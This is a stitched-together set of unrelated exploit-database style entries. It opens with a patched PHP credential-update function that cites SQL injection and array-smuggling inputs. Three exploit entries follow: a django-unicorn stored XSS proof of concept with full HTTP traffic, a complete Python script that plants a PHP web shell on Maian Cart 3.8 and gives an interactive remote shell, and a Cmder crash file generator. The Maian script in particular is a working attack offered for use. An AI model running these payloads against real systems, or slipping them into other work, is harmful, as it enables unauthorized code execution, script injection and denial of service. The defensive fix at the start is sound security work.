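The vulnerable `update_credentials()` above fails in three places: the old-password check passes with no session at all, `extract($_POST)` lets an array stand in for a string, and both column names and values are concatenated into the SQL. The following is an added example, not code from the Simple Online College Entrance Exam System, showing a rewrite that closes all three. Table and column names follow the vulnerable snippet; `$pdo` is assumed to be a PDO connection to the app's SQLite database.

```php
<?php
declare(strict_types=1);
// Added example, not the Simple Online College Entrance Exam System's own code.
// $pdo is assumed to be a PDO handle to the app's SQLite database.

function update_credentials(PDO $pdo): array
{
    // Gap 1: with no session, $_SESSION['password'] was null and md5() of an
    // array was also null, so the loose != check passed. Require a session first.
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    $admin_id = (int)($_SESSION['admin_id'] ?? 0);
    if ($admin_id <= 0) {
        return ['status' => 'failed', 'msg' => 'Not logged in.'];
    }

    // Gap 2: extract($_POST) plus "old_password[]=test" turned a string into an
    // array. Read only the expected keys and reject anything that is not a string.
    foreach (['username', 'password', 'old_password'] as $k) {
        if (isset($_POST[$k]) && !is_string($_POST[$k])) {
            return ['status' => 'failed', 'msg' => 'Invalid input.'];
        }
    }
    $username     = trim($_POST['username'] ?? '');
    $password     = $_POST['password'] ?? '';
    $old_password = $_POST['old_password'] ?? '';

    // The current hash comes from the database row, not from the session.
    $stmt = $pdo->prepare('SELECT password FROM admin_list WHERE admin_id = :id');
    $stmt->execute([':id' => $admin_id]);
    $current = $stmt->fetchColumn();
    if ($current === false) {
        return ['status' => 'failed', 'msg' => 'Account not found.'];
    }

    // Gap 3: column names came from POST keys and values were inlined into the SQL.
    // Here the SET list is fixed in code and every value is a bound parameter, so
    // "test',`password`='...' WHERE admin_id=4;#" is stored literally as a username.
    $sets   = [];
    $params = [':id' => $admin_id];
    if ($username !== '') {
        $sets[] = 'username = :username';
        $params[':username'] = $username;
    }
    if ($password !== '') {
        // password_verify() is constant-time and salted; md5 != is neither.
        if (!password_verify($old_password, (string)$current)) {
            return ['status' => 'failed', 'msg' => 'Old password is incorrect.'];
        }
        $sets[] = 'password = :password';
        $params[':password'] = password_hash($password, PASSWORD_DEFAULT);
    }
    if ($sets === []) {
        return ['status' => 'failed', 'msg' => 'Nothing to update.'];
    }

    $sql = 'UPDATE admin_list SET ' . implode(', ', $sets) . ' WHERE admin_id = :id';
    $pdo->prepare($sql)->execute($params);
    return ['status' => 'success'];
}
```

The caller JSON-encodes the returned array, as the original `$resp` was. One migration caveat: the existing `admin_list` rows hold unsalted md5 hashes, so switching to `password_verify()` needs a rehash step (for instance, re-hashing with `password_hash()` on the next successful md5-verified login), otherwise every old-password check fails after the change.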
            
# Exploit Title: django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS) 
# Date: 10/7/21
# Exploit Author: Raven Security Associates, Inc. (ravensecurity.net)
# Software Link: https://pypi.org/project/django-unicorn/
# Version: <= 0.35.3
# CVE: CVE-2021-42053

django-unicorn <= 0.35.3 suffers from a stored XSS vulnerability because it improperly escapes data from AJAX requests.

Step 1: Go to www.django-unicorn.com/unicorn/message/todo
Step 2: Enter an xss payload in the todo form (https://portswigger.net/web-security/cross-site-scripting/cheat-sheet).


POC:

POST /unicorn/message/todo HTTP/2
Host: www.django-unicorn.com
Cookie: csrftoken=EbjPLEv70y1yPrNMdeFg9pH8hNVBgkrepSzuMM9zi6yPviifZKqQ3uIPJ4hsFq3z
Content-Length: 258
Sec-Ch-Ua: ";Not A Brand";v="99", "Chromium";v="94"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: application/json
X-Requested-With: XMLHttpRequest
X-Csrftoken: EbjPLEv70y1yPrNMdeFg9pH8hNVBgkrepSzuMM9zi6yPviifZKqQ3uIPJ4hsFq3z
Sec-Ch-Ua-Platform: "Linux"
Origin: https://www.django-unicorn.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.django-unicorn.com/examples/todo
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{"id":"Q43GSmJh","data":{"task":"","tasks":[]},"checksum":"4ck2yTwX","actionQueue":[{"type":"syncInput","payload":{"name":"task","value":"<img src=x onerror=alert(origin)>"}},{"type":"callMethod","payload":{"name":"add"},"partial":{}}],"epoch":1633578678871}

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

HTTP/2 200 OK
Date: Thu, 07 Oct 2021 03:51:18 GMT
Content-Type: application/json
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Via: 1.1 vegur
Cf-Cache-Status: DYNAMIC
Expect-Ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b4nQavto8LK9ru7JfhbNimKP71ZlMtduJTy6peHCwxDVWBH2Mkn0f7O%2FpWFy1FgPTd6Z6FmfkYUw5Izn59zN6kTQmjNjddiPWhWCWZWwOFiJf45ESQxuxr44UeDv3w51h1Ri6ESnNE5Y"}],"group":"cf-nel","max_age":604800}
Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
Cf-Ray: 69a42b973f6a6396-ORD
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

{"id": "Q43GSmJh", "data": {"tasks": ["<img src=x onerror=alert(origin)>"]}, "errors": {}, "checksum": "ZQn54Ct4", "dom": "<div unicorn:id=\"Q43GSmJh\" unicorn:name=\"todo\" unicorn:key=\"\" unicorn:checksum=\"ZQn54Ct4\">\n<form unicorn:submit.prevent=\"add\">\n<input type=\"text\" unicorn:model.lazy=\"task\" placeholder=\"New task\" id=\"task\"/>\n</form>\n<button unicorn:click=\"add\">Add</button>\n<p>\n<ul>\n<li><img src=x onerror=alert(origin)></li>\n</ul>\n<button unicorn:click=\"$reset\">Clear all tasks</button>\n</p>\n</div>\n", "return": {"method": "add", "params": [], "value": null}}
            
# Exploit title: Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 27.11.2020 19:35
# Tested on: Ubuntu 20.04 LTS
# Exploit Author(s): DreyAnd, purpl3
# Software Link: https://www.maiancart.com/download.html
# Vendor homepage: https://www.maianscriptworld.co.uk/
# Version: Maian Cart 3.8
# CVE: CVE-2021-32172

#!/usr/bin/python3

import argparse
import requests
from bs4 import BeautifulSoup
import sys
import json
import time

parser = argparse.ArgumentParser()
parser.add_argument("host", help="Host to exploit (with http/https prefix)")
parser.add_argument("dir", help="default=/ , starting directory of the "
                    "maian-cart instance, sometimes is placed at /cart or /maiancart")
args = parser.parse_args()

# args

host = args.host
directory = args.dir

# CREATE THE FILE

print("\033[95mCreating the file to write payload to...\n\033[00m", flush=True)
time.sleep(1)

try:
    r = requests.get(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=shell.php&target=l1_Lw")
    print(r.text)
    if "added" in r.text:
        print("\033[95mFile successfully created.\n\033[00m")
    else:
        print("\033[91mSome error occurred.\033[00m")
        sys.exit(1)

except requests.exceptions.RequestException:
    print("\033[91mThere was a connection issue. Check if you're "
          "connected to wifi or if the host is correct\033[00m")
    sys.exit(1)

# GET THE FILE ID

time.sleep(1)

# the elFinder response is JSON; the hash of the new file is listed under "added"
soup = BeautifulSoup(r.text, 'html.parser')
site_json = json.loads(soup.text)
hash_id = [h.get('hash') for h in site_json['added']]
file_id = hash_id[0]

print("\033[95mGot the file id: ", "\033[91m", file_id, "\033[00m")
print("\n")

# WRITE TO THE FILE

print("\033[95mWriting the payload to the file...\033[00m")
print("\n")
time.sleep(1)

headers = {
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "Accept-Language": "en-US,en;q=0.5",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
    "Connection": "keep-alive",
    "Pragma": "no-cache",
    "Cache-Control": "no-cache",
}

data = f"cmd=put&target={file_id}&content=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%20%3F%3E"

try:
    write = requests.post(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder",
                          headers=headers, data=data)
    print(write.text)
except requests.exceptions.RequestException:
    print("\033[91mThere was a connection issue. Check if you're "
          "connected to wifi or if the host is correct\033[00m")
    sys.exit(1)

# EXECUTE THE PAYLOAD

print("\033[95mExecuting the payload...\033[00m")
print("\n")
time.sleep(1)

exec_host = f"{host}{directory}/product-downloads/shell.php"

print(f"\033[92mGetting a shell. To stop it, press CTRL + C. Browser "
      f"url: {exec_host}?cmd=\033[00m")
time.sleep(2)


def main():
    execute = str(input("$ "))
    e = requests.get(f"{exec_host}?cmd={execute}")
    print(e.text)


while True:
    try:
        main()
    except (KeyboardInterrupt, requests.exceptions.RequestException):
        exit_answer = str(input("\nDo you really wish to exit? Y/N? "))

        if exit_answer == "Y" or exit_answer == "y":
            print("\033[91mExit detected. Removing the shell...\033[00m")
            remove = requests.get(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=rm&targets%5B%5D={file_id}")
            print("\033[91m", remove.text, "\033[00m")
            print("\033[91mBye!\033[00m")
            sys.exit(1)
            
# Exploit Title: Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC)
# Date: 2021-10-07
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://cmder.net
# Software Link: https://github.com/cmderdev/cmder/releases/download/v1.3.18/cmder.zip
# Version: v1.3.18
# Tested on: Windows 10 

# [About - Cmder Console Emulator] :

# Cmder is a software package created over the absence of a usable console emulator on Windows.
# It is based on ConEmu with a major config overhaul, comes with a Monokai color scheme, amazing clink (further enhanced by clink-completions) and a custom prompt layout.

# [Security Issue] : 

# Requires running a .cmd file: the crafted file is passed to the emulator, which triggers the buffer overflow condition.
# E.g. λ cmder.cmd

# [POC] :

PAYLOAD = chr(235) + "\\CMDER"
PAYLOAD = PAYLOAD * 3000
with open("cmder.cmd", "w") as f:
    f.write(PAYLOAD)